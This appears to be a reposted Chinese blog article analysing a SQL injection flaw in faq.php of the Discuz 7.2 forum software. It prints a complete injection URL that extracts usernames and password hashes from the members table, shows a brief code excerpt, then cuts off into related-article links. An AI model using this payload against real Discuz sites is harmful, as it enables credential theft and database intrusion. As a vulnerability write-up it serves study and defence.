Discuz7.2版的faq.php SQL注入漏洞分析
2023-06-01 09:59:25 作者:admin
本文整理自网络,侵删。
注入代码实例:
http://1000zx.cn/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x20,password) from cdb_members limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
漏洞分析: by phithon
代码如下:($action == 'grouppermission') {
...
ksort($gids);
$groupids = array();
foreach($gids as $row) {
$groupids[] = $row[0];
}
阅读剩余部分
相关阅读 >>
discuz中用到的javascript函数解析 font color=red原创font
phpcms 退出无法同步通知discuz问题的解决方法
nginx rewrite 伪静态配置参数详细说明
php 加密与解密的斗争
php discuz 主题表和回帖表的设计
destoon会员注册提示“数据校验失败(2)”解决方法
discuz! x1.5 防cc脚本设置方法
2015年免费wordpress主题推荐(国内精选)
phpmyadmin下载、安装和使用入门教程
php下获取Discuz论坛登录用户名、用户组、用户id等信息的实现代码
更多相关阅读请进入《Discuz论坛》频道 >>
猜你喜欢
联络方式:
400-123-789
邮箱:xiachao@163.com
Q Q:12345678
微信公众号
微信二维码